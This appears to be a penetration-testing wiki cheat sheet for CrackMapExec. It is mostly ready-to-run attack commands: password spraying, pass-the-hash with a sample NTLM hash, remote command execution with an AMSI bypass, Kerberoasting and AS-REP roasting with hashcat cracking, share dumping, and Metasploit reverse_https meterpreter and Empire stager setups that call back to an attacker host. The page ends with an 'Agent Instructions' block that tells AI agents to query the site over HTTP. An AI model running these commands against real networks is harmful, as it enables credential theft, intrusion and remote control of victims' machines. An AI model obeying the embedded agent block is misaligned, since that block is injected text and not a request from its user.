# CrackMapExec {% embed url="" %} ## Installation Run the mass tools script and it will install it. \ ## Using Credentials Every protocol supports using credentials in one form or another. \--crackmapexec \ -u username -p password \--crackmapexec \ -u username -p 'Admin!123@' From Database: \--crackmapexec \ -id \ Multi-domain Env: \--crackmapexec \ -p FILE -u password Where file is... DOMAIN1\user DOMAIN2\user Brute Force / Password Spraying: \--crackmapexec \ -u username1 -p password1 password2 \--crackmapexec \ -u username1 username2 -p password1 \--crackmapexec \ -u \~/file\_containing\_usernames -p \~/file\_containing\_passwords \--crackmapexec \ -u \~/file\_containing\_usernames -H \~/file\_containing\_ntlm\_hashes Password Spraying without BruteForce: \--crackmapexec \ -u \~/file\_containing\_usernames -H \~/file\_containing\_ntlm\_hashes --no-bruteforce \--crackmapexec \ -u \~/file\_containing\_usernames -p \~/file\_containing\_passwords --no-bruteforce ## Using Kerberos CME does support Kerberos authentication, use KRB5CCNAME env name to specify the ticket. When using the option --kerberos, you need to specify the same hostname (FQDN) as the one from the kerberos ticket \--export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache \--sudo cme smb zoro.gold.local --kerberos -x whoami \--export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache \--cme smb zoro.gold.local --kerberos \--sudo cme smb zoro.gold.local --kerberos -x whoami ![](https://1869523342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fhm1D8gi3B6d9E2ORIBkC%2Fuploads%2Ft7PxDzDE29U4uxUOX0TI%2Fimage.png?alt=media\&token=3b1e60ee-590d-4b4d-84a2-e883414b2910) ## Using Modules ![](https://1869523342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fhm1D8gi3B6d9E2ORIBkC%2Fuploads%2FNCFvgsQM1aHBGYTDZI3Y%2Fimage.png?alt=media\&token=ddef99d2-077f-4e98-9250-459084903306) ## Using Database ![](https://1869523342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fhm1D8gi3B6d9E2ORIBkC%2Fuploads%2FK0nEOGtBNpirhJmRIn64%2Fimage.png?alt=media\&token=28ccce00-e5f2-4b6e-be29-7408a7e5893c) ## SMB - Scanning for Vulns When you start your internal pentest, this is the first modules you should try: Zerologon: \--crackmapexec smb \ -u '' -p '' -M zerologon PetitPotam: \--crackmapexec smb -u '' -p '' -M petitpotam noPAC: \--crackmapexec smb -u 'user' -p 'pass' -M nopac ## Enumeration Returns a list of live hosts: \-- cme smb 192.168.1.0/24 Checks for Null Sessions \--cme smb 10.10.10.161 -u '' -p '' \--cme smb 10.10.10.161 --pass-pol \--cme smb 10.10.10.161 --users \--cme smb 10.10.10.161 --groups You can also use... \--smbclient -N -U "" -L \10.10.10.161 \--rpcclient -N -U "" -L \10.10.10.161 \--rpcclient $> enumdomusers Pulling Password Policy: \--cme smb 10.10.10.161 -u '' -p '' --pass-pol Anonymous logon: (make sure password is empty) \--cme smb 10.10.10.178 -u 'a' -p '' You can also use... \--smbclient -N -L \10.10.10.178 \--rpcclient -N -L 10.10.10.178 Enumerate active sessions on remote target: \--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions Enumerate permissions on all shares: \--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares Enumerate disks on remote target: \--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks Enumerate logged on users: \--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users Enumerate domain users: \--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users Enumerate users by bruteforcing the RID on the remote target: \--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute Enumerate domain groups: \--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups Enumerate local groups on the remote target: \--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups Enumerates host with SMB signing not required: Maps the network of live hosts and saves a list of only the hosts that don't require SMB signing. \--cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt \--cat relaylistOutputFilename.txt Checking domain credentials against a subnet: \--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' After obtaining credentials such as Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c::: you can use both the full hash or just the nt hash (second half) \--cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' \--cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' \--cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c' \--cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' Checking local credentials: \--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth \--cme smb 192.168.1.0/24 -u '' -p '' --local-auth \--cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth \--cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth \--cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth \--cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth ## Command Execution CME has three different command execution methods: 1. wmiexec executes commands via WMI 2. atexec executes commands by scheduling a task with windows task scheduler 3. smbexec executes commands by creating and running a service By default CME will fail over to a different execution method if one fails. It attempts to execute commands in the following order: 1. wmiexec 2. atexec 3. smbexec If you want to force CME to use only one execution method you can specify which one using the --exec-method flag. In the following example, we try to execute whoami on the target using the -x flag: \--crackmapexec 192.168.10.11 -u Administrator -p 'P\@ssw0rd' -x whoami You can also directly execute PowerShell commands using the -X flag: \--crackmapexec 192.168.10.11 -u Administrator -p 'P\@ssw0rd' -X '$PSVersionTable' Bypass AMSI: \--crackmapexec 192.168.10.11 -u Administrator -p 'P\@ssw0rd' -X '$PSVersionTable' --amsi-bypass /path/payload For example: \--poetry run crackmapexec smb 192.168.10.11 -u Administrator -p 'P\@ssw0rd' -X '$PSVersionTable' --smb-server-port 1337 Will not work, blocked by AV \--poetry run crackmapexec smb 192.168.10.11 -u Administrator -p 'P\@ssw0rd' -X '$PSVersionTable' --smb-server-port 1337 --amsi-bypass /tmp/amsi Will worked, command executed. ## Getting Shells We can use the empire\_exec module to execute an Empire Agent's initial stager. In the background, the module connects to Empire's RESTful API, generates a launcher for the specified listener and executes it. First setup the rest API: ![](https://1869523342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fhm1D8gi3B6d9E2ORIBkC%2Fuploads%2FHtBYO4PGLLcHChfxfDGd%2Fimage.png?alt=media\&token=5132a375-a2ef-4333-83b9-603ddc831e65) Then just run the empire\_exec module and specify the listener name: \--crackmapexec 192.168.10.0/24 -u username -p password -M empire\_exec -o LISTENER=test Meterpreter: We can use the metinject module launch a meterpreter using Invoke-MetasploitPayload Invoke-MetasploitPayload.ps1 script. On your Metasploit instance, run the following commands > use exploit/multi/script/web\_delivery The SRVHOST and SRVPORT variables are used for running the webserver to host the script > set SRVHOST 10.211.55 > set SRVPORT 8443 The target variable determines what type of script we're using. 2 is for PowerShell > set target 2 Pick your payload. In this case, we'll use a reverse https meterpreter payload > set payload windows/meterpreter/reverse\_https > set LHOST 10.211.55 > set LPORT 443 > run Once run, the web\_delivery module will spin up the webserver to host the script and reverse listener for our meterpreter session. Then just run the met\_inject module and specify the LHOST and LPORT values: \--crackmapexec 192.168.10.0/24 -u username -p password -M met\_inject -o SRVHOST=192.168.10.3 SRVPORT=8443 RAND=eYEssEwv2D SSL=http ## Spidering Shares The module spider\_plus allows you to list and dump all files from all readable shares List all readable files: \--crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider\_plus Dump all files (-o READ\_ONLY=false all files will be copied on the host): \--crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider\_plus -o READ\_ONLY=false ## Sending files to Remote Targets \--cme smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \Windows\Temp\whoami.txt Grab a file fromt he remote target: \--cme smb 172.16.251.152 -u user -p pass --get-file \Windows\Temp\whoami.txt /tmp/whoami.txt ## Dumping Creds ![](https://1869523342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fhm1D8gi3B6d9E2ORIBkC%2Fuploads%2FZka7kZeKUDa1BFCQAEEd%2Fimage.png?alt=media\&token=8ce6bc5c-92a3-4937-afe9-03c0f1cbad4c) ## CME when LAPS is installed on the Domain If LAPS is used inside the domain, is can be hard to use CrackMapExec to execute a command on every computer on the domain. Therefore, a new core option has been added --laps ! If you have compromised an accout that can read LAPS password you can use CrackMapExec like this \--crackmapexec smb -u user-can-read-laps -p pass --laps \--crackmapexec smb -u user-can-read-laps -p pass --laps --sam ## Checking if the Service Spooler is running \--crackmapexec smb -u 'user' -p 'pass' -M spooler Checking if service webdav is running: \--crackmapexec smb -u 'user' -p 'pass' -M webdav ## LDAP Authentication Testing creds: \--cme ldap 192.168.1.0/24 -u user -p password \--cme ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B (domain name resolution is required) ASREP Roast: You can retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos pre-authentication required if you have a list of users on the domain The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS\_REQ request to the KDC on behalf of any of those users, and receive an AS\_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline. More detail in Kerberos theory. \--cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt Using a wordlist, you can find wordlists of username here \--cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt With authentication..... If you have one valid credential on the domain, you can retrieve all the users and hashs where the Kerberos pre-authentication is not required \--cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt Use option kdcHost when the domain name resolution fail \--cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain\_name To crack hashes on the file output.txt with hashcat use the following options: \--hashcat -m18200 output.txt wordlist Kerberoasting: You can retrieve the Kerberos 5 TGS-REP etype 23 hash using Kerberoasting technique The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. More detail in Kerberos theory. To perfom this attack, you need an account on the domain \--cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt \--hashcat -m13100 output.txt wordlist.txt Unconstrained Delegation: CrackMapExec allows you to retrieve the list of all computers et users with the flag TRUSTED\_FOR\_DELEGATION \--cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation Admin Count: adminCount Indicates that a given object has had its ACLs changed to a more secure value by the system because it was a member of one of the administrative groups (directly or transitively). \--cme ldap 192.168.255.131 -u adm -p pass --admin-count Exploit ESC8 (adcs): List all PKI enrollment Server: \--crackmapexec run ldap -u user -p pass -M adcs List all certificates inside a PKI: \--crackmapexec run ldap -u user -p pass -M adcs -o SERVER=xxxx ## WINRM Protocol Password spraying (without Brute force) \--cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce Testing creds: \--cme winrm 192.168.1.0/24 -u user -p password If the SMB port is closed you can also use the flag -d DOMAIN to avoid an SMB connection \--cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN Command Execution: \--cme winrm 192.168.255.131 -u user -p 'password' -X whoami Using CrackMapExec when LAPS installed on the domain If LAPS is used inside the domain, is can be hard to use CrackMapExec to execute a command on every computer on the domain. Therefore, a new core option has been added --laps ! If you have compromised an accout that can read LAPS password you can use CrackMapExec like this \--crackmapexec winrm -u user-can-read-laps -p pass --laps ## MSSQL Password spraying w/o brute \--cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce Windows auth: With SMB port open... \--cme mssql 10.10.10.52 -u james -p 'J\@m3s\_P\@ssW0rd!' With SMB port closed, add the domain flag \--cme mssql 10.10.10.52 -u james -p 'J\@m3s\_P\@ssW0rd!' -d HTB Local auth use the --local-auth command. \--cme mssql 10.10.10.52 -u admin -p 'm$$ql\_S@\_P\@ssW0rd!' --local-auth Specify ports.. \--cme mssql 10.10.10.52 -u admin -p 'm$$ql\_S@\_P\@ssW0rd!' --port 1434 MSSQL Privesc: \--cme mssql -u user -p password -M mssql\_priv Execute MSSQL commands: \--cme mssql 10.10.10.52 -u admin -p 'm$$ql\_S@\_P\@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;' Windows commands: \--cme mssql 10.10.10.59 -u sa -p 'GWE3V65#6KFH93\@4GWTG2G' --local-auth -x whoami ## SSH Password spraying.. \--cme ssh 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce Testing Creds: \--cme ssh 192.168.1.0/24 -u user -p password \--cme http 192.168.1.0/24 --port 2222 Command execution: \--cme ssh 127.0.0.1 -u user -p password -x whoami ## RDP Password spraying... \--poetry run crackmapexec rdp 192.168.1.0/24 -u user -p password \--poetry run crackmapexec rdp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.brinkles.wiki/tools/internal-tools/crackmapexec.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.